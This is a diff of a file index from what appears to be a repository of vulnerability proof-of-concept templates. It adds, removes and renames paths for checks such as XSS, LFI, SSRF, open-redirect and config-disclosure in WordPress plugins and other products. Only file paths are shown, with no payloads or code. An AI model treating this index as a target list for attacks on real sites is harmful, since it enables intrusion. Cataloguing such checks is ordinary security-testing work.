@@ -99779,6 +99765,7 @@ ./poc/wordpress/wp-amasin-the-amazon-affiliate-shop.yaml ./poc/wordpress/wp-amazon-shop-90e615477738db895ced16515c910b83.yaml ./poc/wordpress/wp-amazon-shop.yaml +./poc/wordpress/wp-ambience-xss-11407.yaml ./poc/wordpress/wp-ambience-xss-11409.yaml ./poc/wordpress/wp-ambience-xss-11410.yaml ./poc/wordpress/wp-ambience-xss.yaml @@ -99826,6 +99813,7 @@ ./poc/wordpress/wp-appointment-schedule-booking-system.yaml ./poc/wordpress/wp-appointments-schedules-18c89d6aa69e1599fc784ae097e34287.yaml ./poc/wordpress/wp-appointments-schedules.yaml +./poc/wordpress/wp-arforms-listing-11415.yaml ./poc/wordpress/wp-arforms-listing-11416.yaml ./poc/wordpress/wp-arforms-listing-11417.yaml ./poc/wordpress/wp-arforms-listing-11418.yaml @@ -100141,8 +100129,8 @@ ./poc/wordpress/wp-code-highlightjs-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-code-highlightjs-plugin.yaml ./poc/wordpress/wp-code-highlightjs.yaml -./poc/wordpress/wp-code-snippets-xss-11425.yaml ./poc/wordpress/wp-code-snippets-xss-11426.yaml +./poc/wordpress/wp-code-snippets-xss.yaml ./poc/wordpress/wp-codemirror-block-00c8945b2d90aba47cb8e8cc192bdf4e.yaml ./poc/wordpress/wp-codemirror-block.yaml ./poc/wordpress/wp-coder-132985a8b76990e0c6cd6695eb596f6c.yaml @@ -100343,7 +100331,7 @@ ./poc/wordpress/wp-custom-post-template.yaml ./poc/wordpress/wp-custom-tables-xss-11431.yaml ./poc/wordpress/wp-custom-tables-xss-11432.yaml -./poc/wordpress/wp-custom-tables-xss-11434.yaml +./poc/wordpress/wp-custom-tables-xss-11433.yaml ./poc/wordpress/wp-custom-tables-xss-11435.yaml ./poc/wordpress/wp-custom-tables-xss.yaml ./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml 
@@ -100692,7 +100680,6 @@ ./poc/wordpress/wp-email-subscribers-listing-11440.yaml ./poc/wordpress/wp-email-subscribers-listing-11441.yaml ./poc/wordpress/wp-email-subscribers-listing-11443.yaml -./poc/wordpress/wp-email-subscribers-listing.yaml ./poc/wordpress/wp-email-template-1729a8753eae476fa81f29fbf915eae7.yaml ./poc/wordpress/wp-email-template-77ad67534972b8073fe68dc3e6a0ae34.yaml ./poc/wordpress/wp-email-template-9ceea61553b1440c884786aa4c073642.yaml @@ -100969,7 +100956,6 @@ ./poc/wordpress/wp-filemanager.yaml ./poc/wordpress/wp-film-studio-49f13dc6fa66760ca1ff6d5f40c3291d.yaml ./poc/wordpress/wp-film-studio.yaml -./poc/wordpress/wp-finder-xss-11445.yaml ./poc/wordpress/wp-finder-xss-11447.yaml ./poc/wordpress/wp-finder-xss-11448.yaml ./poc/wordpress/wp-finder-xss-11449.yaml @@ -101007,6 +100993,7 @@ ./poc/wordpress/wp-footnotes.yaml ./poc/wordpress/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/wordpress/wp-force-ssl-8016151e9aade43a962c06ab9c46dfaf.yaml +./poc/wordpress/wp-force-ssl.yaml ./poc/wordpress/wp-forecast-8095a25d926aef6f4d242637d15ae9bf.yaml ./poc/wordpress/wp-forecast-bbfafd2718458509e63452a3085f34b5.yaml ./poc/wordpress/wp-forecast.yaml @@ -101052,8 +101039,8 @@ ./poc/wordpress/wp-front-end-repository.yaml ./poc/wordpress/wp-full-auto-tags-manager-4c934eda242d0419e3e635b91ae55277.yaml ./poc/wordpress/wp-full-auto-tags-manager.yaml +./poc/wordpress/wp-full-path-disclosure-11455.yaml ./poc/wordpress/wp-full-path-disclosure-11456.yaml -./poc/wordpress/wp-full-path-disclosure-11457.yaml ./poc/wordpress/wp-full-path-disclosure.yaml ./poc/wordpress/wp-full-stripe-free-080a5561255af98399eb27da1263ccaf.yaml ./poc/wordpress/wp-full-stripe-free-880466ddc7fd0af03d20a07473dd287e.yaml 
@@ -101200,14 +101187,14 @@ ./poc/wordpress/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml ./poc/wordpress/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/wordpress/wp-gravity-forms-spreadsheets.yaml +./poc/wordpress/wp-grimag-open-redirect-11458.yaml ./poc/wordpress/wp-grimag-open-redirect-11459.yaml ./poc/wordpress/wp-grimag-open-redirect-11460.yaml ./poc/wordpress/wp-grimag-open-redirect-11461.yaml ./poc/wordpress/wp-grimag-open-redirect-11462.yaml +./poc/wordpress/wp-gtranslate-open-redirect-11463.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11464.yaml -./poc/wordpress/wp-gtranslate-open-redirect-11465.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11466.yaml -./poc/wordpress/wp-gtranslate-open-redirect.yaml ./poc/wordpress/wp-guestmap-138b91374da611e5609255da3727b885.yaml ./poc/wordpress/wp-guestmap.yaml ./poc/wordpress/wp-guppy-c55927dc6402e6af39078d4c3378b5b6.yaml @@ -101360,9 +101347,10 @@ ./poc/wordpress/wp-insert.yaml ./poc/wordpress/wp-instagram-bank-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/wp-instagram-bank.yaml +./poc/wordpress/wp-install-11473.yaml ./poc/wordpress/wp-install-11474.yaml -./poc/wordpress/wp-install-11475.yaml ./poc/wordpress/wp-install-php.yaml +./poc/wordpress/wp-install.yaml ./poc/wordpress/wp-instance-rename-f54408534e740536e4255c5420540815.yaml ./poc/wordpress/wp-instance-rename.yaml ./poc/wordpress/wp-insurance-d6bda609865d6ab618b4f735cbea39bb.yaml @@ -101395,7 +101383,7 @@ ./poc/wordpress/wp-iwp-client-listing-11479.yaml ./poc/wordpress/wp-javospot-lfi-11480.yaml ./poc/wordpress/wp-javospot-lfi-11481.yaml -./poc/wordpress/wp-javospot-lfi.yaml +./poc/wordpress/wp-javospot-lfi-11482.yaml ./poc/wordpress/wp-javospot-premium-theme-lfi.yaml ./poc/wordpress/wp-jitsi-shortcodes-7170b6ccdadf79ce812cf8db156d523a.yaml ./poc/wordpress/wp-jitsi-shortcodes-ae288d2fafe96b20fe651a633ad8ef11.yaml 
@@ -101501,7 +101489,7 @@ ./poc/wordpress/wp-knews-xss-11484.yaml ./poc/wordpress/wp-knews-xss-11485.yaml ./poc/wordpress/wp-knews-xss-11486.yaml -./poc/wordpress/wp-knews-xss-11487.yaml +./poc/wordpress/wp-knews-xss-11488.yaml ./poc/wordpress/wp-knews-xss.yaml ./poc/wordpress/wp-knowledgebase-ce12311920213990a4e4a36be60be911.yaml ./poc/wordpress/wp-knowledgebase.yaml @@ -101806,6 +101794,7 @@ ./poc/wordpress/wp-memory-plugin.yaml ./poc/wordpress/wp-memory.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-1.yaml +./poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11498.yaml @@ -101917,6 +101906,7 @@ ./poc/wordpress/wp-mpdf-2c78393e91f992fef96c27f7c515219b.yaml ./poc/wordpress/wp-mpdf-95b1d86b0d9172f70e27dd5cdd6025a1.yaml ./poc/wordpress/wp-mpdf.yaml +./poc/wordpress/wp-mstore-plugin-listing-11500.yaml ./poc/wordpress/wp-mstore-plugin-listing-11501.yaml ./poc/wordpress/wp-mui-mass-user-input-a8af40a859ef12017793ca809201c2d2.yaml ./poc/wordpress/wp-mui-mass-user-input-b32a81e6becbfc443d59541b147d668c.yaml @@ -101932,6 +101922,7 @@ ./poc/wordpress/wp-multiple-theme-ssrf-11510.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11511.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11512.yaml +./poc/wordpress/wp-multiple-theme-ssrf-11513.yaml ./poc/wordpress/wp-multisite-content-copier-02469035e949992a5abfd04fc61ddbad.yaml ./poc/wordpress/wp-multisite-content-copier-9f591f88f9aee0030295b5c3d28f9149.yaml ./poc/wordpress/wp-multisite-content-copier-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -102116,7 +102107,6 @@ ./poc/wordpress/wp-photo-text-slider-50.yaml ./poc/wordpress/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/wordpress/wp-php-widget.yaml -./poc/wordpress/wp-phpfreechat-xss-11524.yaml ./poc/wordpress/wp-phpfreechat-xss-11526.yaml ./poc/wordpress/wp-phpfreechat-xss-11527.yaml ./poc/wordpress/wp-phpfreechat-xss-11528.yaml @@ -102160,9 +102150,10 @@ ./poc/wordpress/wp-plotly-75c21e80d525814876b411270547e062.yaml ./poc/wordpress/wp-plotly.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-1.yaml -./poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml +./poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-11532.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-2.yaml +./poc/wordpress/wp-plugin-1-flashgallery-listing.yaml ./poc/wordpress/wp-plugin-ad-widget-lfi.yaml ./poc/wordpress/wp-plugin-canto-ssrf.yaml ./poc/wordpress/wp-plugin-info-card-2c6bf7db3c2496dc0c84092a58ea166f.yaml @@ -102186,7 +102177,7 @@ ./poc/wordpress/wp-plugin-utlimate-member-11539.yaml ./poc/wordpress/wp-plugin-utlimate-member-11540.yaml ./poc/wordpress/wp-plugin-utlimate-member-11541.yaml -./poc/wordpress/wp-plugin-utlimate-member.yaml +./poc/wordpress/wp-plugin-utlimate-member-11542.yaml ./poc/wordpress/wp-plugin-wp-with-spritz-lfi.yaml ./poc/wordpress/wp-plugins.yaml ./poc/wordpress/wp-pocket-urls-254217ba23bf67e5ab1f8ee2edeef109.yaml 
@@ -102213,9 +102204,9 @@ ./poc/wordpress/wp-popup-builder-0c09eb9779aee8d5af8e26f717d75189.yaml ./poc/wordpress/wp-popup-builder-a5f68b9d82c37b214641a19757438e98.yaml ./poc/wordpress/wp-popup-builder.yaml +./poc/wordpress/wp-popup-listing-11543.yaml ./poc/wordpress/wp-popup-listing-11544.yaml ./poc/wordpress/wp-popup-listing-11545.yaml -./poc/wordpress/wp-popup-listing.yaml ./poc/wordpress/wp-popups-lite-397d56c4826cb39d4978e607d024b3f6.yaml ./poc/wordpress/wp-popups-lite-482e13507074a152afd1c369afb2758f.yaml ./poc/wordpress/wp-popups-lite-69ef67ee7aec095c81a6e3175b553ce1.yaml @@ -102369,14 +102360,14 @@ ./poc/wordpress/wp-property-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-property-plugin.yaml ./poc/wordpress/wp-property.yaml -./poc/wordpress/wp-prostore-open-redirect-11546.yaml ./poc/wordpress/wp-prostore-open-redirect-11547.yaml ./poc/wordpress/wp-prostore-open-redirect-11548.yaml ./poc/wordpress/wp-prostore-open-redirect-11549.yaml +./poc/wordpress/wp-prostore-open-redirect-11550.yaml ./poc/wordpress/wp-publications-b85a3c11767227494a836174e6262f5c.yaml ./poc/wordpress/wp-publications.yaml ./poc/wordpress/wp-qards-listing-11551.yaml -./poc/wordpress/wp-qards-listing-11552.yaml +./poc/wordpress/wp-qards-listing.yaml ./poc/wordpress/wp-qrcode-me-v-card-314ed947e5aebc74cf601ba290f4edad.yaml ./poc/wordpress/wp-qrcode-me-v-card.yaml ./poc/wordpress/wp-quick-front-end-editor-02de13f83ec39d9f9fa219b2764f4023.yaml @@ -102541,6 +102532,7 @@ ./poc/wordpress/wp-reviews-plugin-for-google-ef8cb6fc353aaae2bbe90dfc74187793.yaml ./poc/wordpress/wp-reviews-plugin-for-google.yaml ./poc/wordpress/wp-revslider-file-download-11553.yaml +./poc/wordpress/wp-revslider-file-download-11554.yaml ./poc/wordpress/wp-revslider-file-download-11555.yaml ./poc/wordpress/wp-revslider-file-download.yaml ./poc/wordpress/wp-roadmap-7e3122605112af28a9af70aa035a1854.yaml 
@@ -102618,9 +102610,9 @@ ./poc/wordpress/wp-search-filter.yaml ./poc/wordpress/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml ./poc/wordpress/wp-search-keyword-redirect.yaml +./poc/wordpress/wp-securimage-xss-11556.yaml ./poc/wordpress/wp-securimage-xss-11558.yaml ./poc/wordpress/wp-securimage-xss-11559.yaml -./poc/wordpress/wp-securimage-xss-11560.yaml ./poc/wordpress/wp-securimage-xss.yaml ./poc/wordpress/wp-security-audit-log-00ed417b21dd63bdfa86736dcf1b985f.yaml ./poc/wordpress/wp-security-audit-log-069819bcca9f4c9d5cccbe176453ccc4.yaml @@ -102701,8 +102693,8 @@ ./poc/wordpress/wp-setup-config.yaml ./poc/wordpress/wp-setup-wizard-8c031e05af523e07598a9fec815c857a.yaml ./poc/wordpress/wp-setup-wizard.yaml -./poc/wordpress/wp-sfwd-lms-listing-11562.yaml ./poc/wordpress/wp-sfwd-lms-listing-11563.yaml +./poc/wordpress/wp-sfwd-lms-listing-11564.yaml ./poc/wordpress/wp-sfwd-lms-listing-11565.yaml ./poc/wordpress/wp-shamsi-124603a63a010e84e51504af813f16d0.yaml ./poc/wordpress/wp-shamsi-d80212b26727fff04d47601179cd407f.yaml @@ -102752,7 +102744,6 @@ ./poc/wordpress/wp-simple-fields-lfi-11566.yaml ./poc/wordpress/wp-simple-fields-lfi-11567.yaml ./poc/wordpress/wp-simple-fields-lfi-11568.yaml -./poc/wordpress/wp-simple-fields-lfi-11569.yaml ./poc/wordpress/wp-simple-fields-lfi-11570.yaml ./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml @@ -102799,8 +102790,8 @@ ./poc/wordpress/wp-sitemap-page.yaml ./poc/wordpress/wp-slick-slider-and-image-carousel-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/wordpress/wp-slick-slider-and-image-carousel.yaml -./poc/wordpress/wp-slideshow-xss-11572.yaml ./poc/wordpress/wp-slideshow-xss-11573.yaml +./poc/wordpress/wp-slideshow-xss-11574.yaml ./poc/wordpress/wp-slideshow-xss-11575.yaml ./poc/wordpress/wp-slideshow-xss-11576.yaml ./poc/wordpress/wp-slideshow-xss.yaml 
@@ -103348,8 +103339,8 @@ ./poc/wordpress/wp-tutor-lfi-11597.yaml ./poc/wordpress/wp-tutor-lfi-11598.yaml ./poc/wordpress/wp-tutor-lfi-11599.yaml -./poc/wordpress/wp-tutor-lfi-11600.yaml ./poc/wordpress/wp-tutor-lfi-11601.yaml +./poc/wordpress/wp-tutor-lfi.yaml ./poc/wordpress/wp-twilio-core-57a9edaed661bdb0228f355d7457cb63.yaml ./poc/wordpress/wp-twilio-core-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-twilio-core.yaml @@ -103554,6 +103545,7 @@ ./poc/wordpress/wp-vault-lfi-11610.yaml ./poc/wordpress/wp-vault-lfi-11611.yaml ./poc/wordpress/wp-vault-lfi-11612.yaml +./poc/wordpress/wp-vault-local-file-inclusion.yaml ./poc/wordpress/wp-vault-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-vault-plugin.yaml ./poc/wordpress/wp-vault.yaml @@ -103624,6 +103616,7 @@ ./poc/wordpress/wp-whatsapp-chat.yaml ./poc/wordpress/wp-whatsapp.yaml ./poc/wordpress/wp-whmcs-xss-11613.yaml +./poc/wordpress/wp-whmcs-xss-11614.yaml ./poc/wordpress/wp-whmcs-xss.yaml ./poc/wordpress/wp-whois-domain-a87495e38de2f623ebcaa4729c800268.yaml ./poc/wordpress/wp-whois-domain.yaml @@ -103643,8 +103636,8 @@ ./poc/wordpress/wp-woocommerce-email-verification-11618.yaml ./poc/wordpress/wp-woocommerce-email-verification-11619.yaml ./poc/wordpress/wp-woocommerce-email-verification-2.yaml +./poc/wordpress/wp-woocommerce-file-download-11620.yaml ./poc/wordpress/wp-woocommerce-file-download-11621.yaml -./poc/wordpress/wp-woocommerce-file-download.yaml ./poc/wordpress/wp-woocommerce-pdf-invoice-listing-11622.yaml ./poc/wordpress/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml ./poc/wordpress/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml 
@@ -103944,8 +103937,8 @@ ./poc/wordpress/wpdiscuz-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wpdiscuz-plugin.yaml ./poc/wordpress/wpdiscuz.yaml +./poc/wordpress/wpdm-cache-session-11436.yaml ./poc/wordpress/wpdm-cache-session-11437.yaml -./poc/wordpress/wpdm-cache-session-11438.yaml ./poc/wordpress/wpdm-cache-session-11439.yaml ./poc/wordpress/wpdm-cache-session.yaml ./poc/wordpress/wpdm-gutenberg-blocks-055c2a59f216ef473b493c568e05a010.yaml @@ -103962,7 +103955,6 @@ ./poc/wordpress/wpe-indoshipping.yaml ./poc/wordpress/wpematico-ec832e52a1347479f81a04d23ebf54b8.yaml ./poc/wordpress/wpematico.yaml -./poc/wordpress/wpengine-config-check.yaml ./poc/wordpress/wpeprivate-config-disclosure.yaml ./poc/wordpress/wpeprivate_leak.yaml ./poc/wordpress/wpforms-12c717c4e562d85a3a1cb61be261222c.yaml @@ -104413,6 +104405,7 @@ ./poc/wordpress/wptouch-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wptouch-e99bc150ef15024383b8cf0e64525f28.yaml ./poc/wordpress/wptouch-fa8996e405ccfd1e139b071450a49a11.yaml +./poc/wordpress/wptouch-open-redirect-11592.yaml ./poc/wordpress/wptouch-open-redirect-11593.yaml ./poc/wordpress/wptouch-open-redirect-11594.yaml ./poc/wordpress/wptouch-open-redirect-11595.yaml @@ -104533,7 +104526,7 @@ ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-1.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10428.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10429.yaml -./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml +./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10432.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-2.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml 
@@ -104585,9 +104578,7 @@ ./poc/xss/acme-xss-29.yaml ./poc/xss/admin-ajax-xss.yaml ./poc/xss/aem-setpreferences-xss-189.yaml -./poc/xss/aem-setpreferences-xss.yaml -./poc/xss/aem-xss-childlist-selector-197.yaml -./poc/xss/aem-xss-childlist-selector.yaml +./poc/xss/aem-xss-childlist-selector-198.yaml ./poc/xss/aikcms_v2-xss.yaml ./poc/xss/akamai-arl-xss-247.yaml ./poc/xss/akamai-arl-xss-248.yaml @@ -104597,7 +104588,6 @@ ./poc/xss/axublog-goindes-xss.yaml ./poc/xss/basic-xss-prober-695.yaml ./poc/xss/basic-xss-prober-697.yaml -./poc/xss/basic-xss-prober-698.yaml ./poc/xss/basic-xss-prober-699.yaml ./poc/xss/basic-xss-prober.yaml ./poc/xss/bitrix-getmessage-xss.yaml @@ -104626,13 +104616,14 @@ ./poc/xss/clicshopping-v2-xss.yaml ./poc/xss/coldfusion-debug-xss-1.yaml ./poc/xss/coldfusion-debug-xss-1152.yaml +./poc/xss/coldfusion-debug-xss-1153.yaml ./poc/xss/coldfusion-debug-xss-1154.yaml ./poc/xss/coldfusion-debug-xss-2.yaml -./poc/xss/coldfusion-debug-xss.yaml ./poc/xss/concrete-xss-1174.yaml ./poc/xss/concrete-xss-1175.yaml ./poc/xss/concrete-xss-1176.yaml -./poc/xss/concrete-xss-1177.yaml +./poc/xss/concrete-xss-1178.yaml +./poc/xss/concrete-xss.yaml ./poc/xss/concretexss.yaml ./poc/xss/ctp-xss.yaml ./poc/xss/custom-aem-xss.yaml 
@@ -104653,17 +104644,17 @@ ./poc/xss/drupal_module-fraction-xss-vulnerability.yaml ./poc/xss/eclipse-help-system-xss-7164.yaml ./poc/xss/eclipse-xss.yaml -./poc/xss/elex-woocommerce-xss-7199.yaml ./poc/xss/elex-woocommerce-xss-7200.yaml +./poc/xss/elex-woocommerce-xss.yaml +./poc/xss/empirecms-xss-7218.yaml ./poc/xss/empirecms-xss-7219.yaml -./poc/xss/empirecms-xss-7220.yaml -./poc/xss/empirecms-xss.yaml ./poc/xss/eris-xss.yaml ./poc/xss/exchange-cve-2021-41349-xss.yml ./poc/xss/express-xss.yaml +./poc/xss/feedwordpress-xss-7459.yaml ./poc/xss/feedwordpress-xss-7460.yaml ./poc/xss/feedwordpress-xss.yaml -./poc/xss/flow-flow-social-stream-xss.yaml +./poc/xss/flow-flow-social-stream-xss-7524.yaml ./poc/xss/fuzzing-xss-get-params-html-attribute-injection.yaml ./poc/xss/fuzzing-xss-get-params-html-injection.yaml ./poc/xss/fuzzing-xss-get-params-javascript-context-injection.yaml @@ -104694,7 +104685,6 @@ ./poc/xss/java-melody-xss.yaml ./poc/xss/jenkins-audit-trail-xss.yaml ./poc/xss/jorani-benjamin-xss.yaml -./poc/xss/kafdrop-xss-8411.yaml ./poc/xss/kafdrop-xss-8413.yaml ./poc/xss/kafdrop-xss-8414.yaml ./poc/xss/kafdrop-xss.yaml @@ -104707,6 +104697,7 @@ ./poc/xss/keycloak-xss.yaml ./poc/xss/laravel-ignition-xss-8592.yaml ./poc/xss/laravel-ignition-xss-8593.yaml +./poc/xss/laravel-ignition-xss.yaml ./poc/xss/ldap-wp-login-xss.yaml ./poc/xss/lucee-xss-1.yaml ./poc/xss/lucee-xss-2.yaml 
@@ -104717,18 +104708,17 @@ ./poc/xss/mida-eframework-xss-8866.yaml ./poc/xss/mida-eframework-xss-8867.yaml ./poc/xss/mida-eframework-xss-8868.yaml +./poc/xss/mida-eframework-xss.yaml ./poc/xss/moodle-auth-xss.yaml ./poc/xss/moodle-filter-jmol-xss-8942.yaml ./poc/xss/moodle-filter-jmol-xss-8943.yaml ./poc/xss/moodle-filter-jmol-xss-8944.yaml ./poc/xss/moodle-filter-jmol-xss-8945.yaml -./poc/xss/moodle-filter-jmol-xss-8946.yaml ./poc/xss/moodle-filter-jmol-xss-8947.yaml ./poc/xss/moodle-filter-jmol-xss.yaml ./poc/xss/moodle-jitsi-plugin-xss.yaml ./poc/xss/moodle-xss-8948.yaml ./poc/xss/moodle-xss-8949.yaml -./poc/xss/moodle-xss-8950.yaml ./poc/xss/moodle-xss-8951.yaml ./poc/xss/moodle-xss-8952.yaml ./poc/xss/ms-exchange-server-reflected-xss-8962.yaml @@ -104754,8 +104744,8 @@ ./poc/xss/oracle-ebs-xss-1.yaml ./poc/xss/oracle-ebs-xss-2.yaml ./poc/xss/oracle-ebs-xss-3.yaml +./poc/xss/oracle-ebs-xss-9373.yaml ./poc/xss/oracle-ebs-xss-9375.yaml -./poc/xss/oracle-ebs-xss-9376.yaml ./poc/xss/oracle-ebs-xss-9377.yaml ./poc/xss/oracle-ebs-xss.yaml ./poc/xss/oracle-oam-xss.yaml @@ -104767,6 +104757,8 @@ ./poc/xss/parentlink-xss-1.yaml ./poc/xss/parentlink-xss-2.yaml ./poc/xss/parentlink-xss-9466.yaml +./poc/xss/parentlink-xss-9467.yaml +./poc/xss/parentlink-xss.yaml ./poc/xss/php-timeclock-xss-9550.yaml ./poc/xss/php-timeclock-xss-9551.yaml ./poc/xss/php-timeclock-xss-9552.yaml @@ -104777,7 +104769,7 @@ ./poc/xss/pmb-xss.yaml ./poc/xss/qcubed-xss-1.yaml ./poc/xss/qcubed-xss-2.yaml -./poc/xss/qcubed-xss-9749.yaml +./poc/xss/qcubed-xss.yaml ./poc/xss/rails6-xss-9797.yaml ./poc/xss/rails6-xss-9798.yaml ./poc/xss/rails6-xss-9799.yaml 
@@ -104785,12 +104777,12 @@ ./poc/xss/reflected-xss-apollo.yaml ./poc/xss/reflected-xss.yaml ./poc/xss/rockmongo-xss-9901.yaml -./poc/xss/rockmongo-xss-9902.yaml ./poc/xss/rockmongo-xss-9903.yaml ./poc/xss/rockmongo-xss-9904.yaml +./poc/xss/rxss.yaml +./poc/xss/samsung-wlan-ap-xss-10012.yaml ./poc/xss/samsung-wlan-ap-xss-10013.yaml ./poc/xss/samsung-wlan-ap-xss-10014.yaml -./poc/xss/samsung-wlan-ap-xss.yaml ./poc/xss/sassy-social-share-xss.yaml ./poc/xss/seo-panel-reset-password-xss.yaml ./poc/xss/setPreferences-xss.yaml @@ -104804,11 +104796,12 @@ ./poc/xss/sniplets-xss-10344.yaml ./poc/xss/sniplets-xss-10345.yaml ./poc/xss/sniplets-xss.yaml -./poc/xss/squirrelmail-add-xss.yaml +./poc/xss/squirrelmail-add-xss-10515.yaml ./poc/xss/squirrelmail-vkeyboard-xss-10522.yaml ./poc/xss/swagger-xss.yaml ./poc/xss/t-soft-e-commerce4-urunadi-stored-xss.yaml ./poc/xss/thruk-xss-10758.yaml +./poc/xss/thruk-xss-10759.yaml ./poc/xss/tikiwiki-reflected-xss-1.yaml ./poc/xss/tikiwiki-reflected-xss-10777.yaml ./poc/xss/tikiwiki-reflected-xss-10778.yaml @@ -104818,8 +104811,8 @@ ./poc/xss/tikiwiki-xss.yaml ./poc/xss/top-15-xss.yaml ./poc/xss/top-xss-params-10806.yaml +./poc/xss/top-xss-params-10807.yaml ./poc/xss/top-xss-params-10808.yaml -./poc/xss/top-xss-params-10809.yaml ./poc/xss/top-xss-params.yaml ./poc/xss/turbocrm-xss-10848.yaml ./poc/xss/turbocrm-xss-10849.yaml 
@@ -104834,16 +104827,15 @@ ./poc/xss/weblogic-servlet-xss.yml ./poc/xss/wems-enterprise-xss.yaml ./poc/xss/wems-manager-xss-11191.yaml +./poc/xss/wems-manager-xss-11192.yaml ./poc/xss/wems-manager-xss-11193.yaml ./poc/xss/wems-manager-xss-11194.yaml -./poc/xss/wems-manager-xss.yaml ./poc/xss/window-name-domxss-11212.yaml +./poc/xss/window-name-domxss-11213.yaml ./poc/xss/window-name-domxss-11214.yaml -./poc/xss/window-name-domxss.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11355.yaml -./poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml ./poc/xss/wordpress-wordfence-xss-11357.yaml ./poc/xss/wordpress-wordfence-xss-11358.yaml ./poc/xss/wordpress-wordfence-xss-11359.yaml @@ -104853,11 +104845,12 @@ ./poc/xss/wordpress-zebra-form-xss-11375.yaml ./poc/xss/wordpress-zebra-form-xss-11376.yaml ./poc/xss/wordpress-zebra-form-xss-11377.yaml -./poc/xss/wordpress-zebra-form-xss-11378.yaml +./poc/xss/wordpress-zebra-form-xss-11379.yaml ./poc/xss/wordpress-zebra-form-xss.yaml ./poc/xss/wp-adaptive-xss-11403.yaml ./poc/xss/wp-adaptive-xss-11404.yaml ./poc/xss/wp-adaptive-xss.yaml +./poc/xss/wp-ambience-xss-11407.yaml ./poc/xss/wp-ambience-xss-11409.yaml ./poc/xss/wp-ambience-xss-11410.yaml ./poc/xss/wp-ambience-xss.yaml 
@@ -104868,14 +104861,13 @@ ./poc/xss/wp-church-admin-xss-11423.yaml ./poc/xss/wp-church-admin-xss-11424.yaml ./poc/xss/wp-church-admin-xss.yaml -./poc/xss/wp-code-snippets-xss-11425.yaml ./poc/xss/wp-code-snippets-xss-11426.yaml +./poc/xss/wp-code-snippets-xss.yaml ./poc/xss/wp-custom-tables-xss-11431.yaml ./poc/xss/wp-custom-tables-xss-11432.yaml -./poc/xss/wp-custom-tables-xss-11434.yaml +./poc/xss/wp-custom-tables-xss-11433.yaml ./poc/xss/wp-custom-tables-xss-11435.yaml ./poc/xss/wp-custom-tables-xss.yaml -./poc/xss/wp-finder-xss-11445.yaml ./poc/xss/wp-finder-xss-11447.yaml ./poc/xss/wp-finder-xss-11448.yaml ./poc/xss/wp-finder-xss-11449.yaml @@ -104890,14 +104882,13 @@ ./poc/xss/wp-knews-xss-11484.yaml ./poc/xss/wp-knews-xss-11485.yaml ./poc/xss/wp-knews-xss-11486.yaml -./poc/xss/wp-knews-xss-11487.yaml +./poc/xss/wp-knews-xss-11488.yaml ./poc/xss/wp-knews-xss.yaml ./poc/xss/wp-nextgen-xss-11514.yaml ./poc/xss/wp-nextgen-xss-11515.yaml ./poc/xss/wp-nextgen-xss-11516.yaml ./poc/xss/wp-nextgen-xss-11518.yaml ./poc/xss/wp-nextgen-xss.yaml -./poc/xss/wp-phpfreechat-xss-11524.yaml ./poc/xss/wp-phpfreechat-xss-11526.yaml ./poc/xss/wp-phpfreechat-xss-11527.yaml ./poc/xss/wp-phpfreechat-xss-11528.yaml @@ -104906,12 +104897,12 @@ ./poc/xss/wp-plugin-marmoset-viewer-xss-11538.yaml ./poc/xss/wp-plugin-marmoset-viewer-xss.yaml ./poc/xss/wp-qwiz-online-xss.yaml +./poc/xss/wp-securimage-xss-11556.yaml ./poc/xss/wp-securimage-xss-11558.yaml ./poc/xss/wp-securimage-xss-11559.yaml -./poc/xss/wp-securimage-xss-11560.yaml ./poc/xss/wp-securimage-xss.yaml -./poc/xss/wp-slideshow-xss-11572.yaml ./poc/xss/wp-slideshow-xss-11573.yaml +./poc/xss/wp-slideshow-xss-11574.yaml ./poc/xss/wp-slideshow-xss-11575.yaml 